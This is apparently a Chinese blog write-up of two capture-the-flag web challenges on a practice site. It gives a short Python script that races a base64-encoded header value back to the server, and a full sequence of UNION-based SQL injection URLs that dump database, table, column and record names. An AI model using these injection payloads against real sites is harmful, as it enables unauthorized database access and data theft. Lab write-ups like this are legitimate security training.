实验吧Write_up : Web

Author Avatar
Pr0ph3t 5月 14, 2017

0x00 唯快不破

目标url : 点我

题目
一进去是这样子的

然后随便翻翻发现有两处线索:
1. http header

2.http源码中的注释

然后尝试了把header里面的FLAG base64解密之后–>P0ST_THIS_T0_CH4NGE_FL4G:6yTJJqonu
这个东西每次刷新都会改变
然后手动post上去之后:

被嘲讽,
遂写个脚本秒回去

#coding:utf-8import requests import re import base64def main(): r = requests.get('http://ctf5.shiyanbar.com/web/10/10.php') header = r.headers key = base64.b64decode(header['FLAG'])[25:] r = requests.post(url = 'http://ctf5.shiyanbar.com/web/10/10.php' ,data={'key':key}) print r.textif name == 'main': main() 

结果如图:

附上flag文字版:

CTF{Y0U_4R3_1NCR3D1BL3_F4ST!}

我不快!脚本快而已!

0x01 这个看起来有点简单

进入目标url点我
如下:

试了一下id=1’报错

再试一下id=1 and 1=1#发现正常,id=1 and 1=2#查询不到内容

试了一下。。毫无过滤。。直接上payload

爆库名:http://ctf5.shiyanbar.com/8/index.php?id=1 union select 2333,database()

爆表名:http://ctf5.shiyanbar.com/8/index.php?id=1 union select 2333,group_concat(table_name) from information_schema.tables where table_schema=database()

爆列名:http://ctf5.shiyanbar.com/8/index.php?id=1 union select 2333,group_concat(column_name) from information_schema.columns where table_schema=database()

http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%202333,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x746869736b6579

****我们要的东西应该在thiskey表内****

爆记录:http://ctf5.shiyanbar.com/8/index.php?id=1 union select 2333,group_concat(k0y) from thiskey

拿到flag:

whatiMyD91dump

搞笑的是。。这题交这个答案是错的,然后看到评论区的朋友们说要把91的1改成英文的l。。。然后就通过了

发表评论

电子邮件地址不会被公开。 必填项已用*标注